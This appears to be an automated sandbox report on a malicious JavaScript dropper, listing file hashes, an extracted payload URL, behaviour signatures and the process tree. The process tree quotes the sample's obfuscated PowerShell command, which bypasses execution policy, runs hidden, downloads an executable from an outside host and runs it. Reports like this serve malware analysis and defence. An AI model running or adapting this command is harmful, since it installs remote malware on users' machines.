Analysis

  • max time kernel
    17s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-01-2021 21:43

General

  • Target

    4IW7erkj68.js

  • Size

    21KB

  • MD5

    ffff42a84871648a25ba2c39beca8d83

  • SHA1

    31acbb969b4b9d167f5ad4c78510ba2e8e0b4610

  • SHA256

    c03c5f7dabff34048550ffe1290d714291c554cdffa85da7116c3b675aadb458

  • SHA512

    b770666259807832786ee526c51ba18b59f80ba58a30d1ef892360bc88d71627674d341dea31f56221e821d072a67d1c62e82b3fd9b26338167046e3bcfdfe41

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\4IW7erkj68.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%VKF54.exe'); & %temp%VKF54.exe & BTHpwAoayRPbclY
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempVKF54.exe');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3708

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\AppData\Local\TempVKF54.exe
    MD5

    2f5cded6abfe8576ea9ce3c91916efb3

    SHA1

    2e45ab8e29f1a10b9261df8f1567b26cfd24284c

    SHA256

    2883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15

    SHA512

    de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98

  • memory/2788-2-0x0000000000000000-mapping.dmp
  • memory/3708-3-0x0000000000000000-mapping.dmp
  • memory/3708-4-0x00007FFB852D0000-0x00007FFB85CBC000-memory.dmp
    Filesize

    9.9MB

  • memory/3708-5-0x0000014C9E5E0000-0x0000014C9E5E1000-memory.dmp
    Filesize

    4KB

  • memory/3708-6-0x0000014C9E3F0000-0x0000014C9E3F2000-memory.dmp
    Filesize

    8KB

  • memory/3708-7-0x0000014C9E3F3000-0x0000014C9E3F5000-memory.dmp
    Filesize

    8KB

  • memory/3708-8-0x0000014CB8BB0000-0x0000014CB8BB1000-memory.dmp
    Filesize

    4KB

  • memory/3708-9-0x0000014C9E3F6000-0x0000014C9E3F8000-memory.dmp
    Filesize

    8KB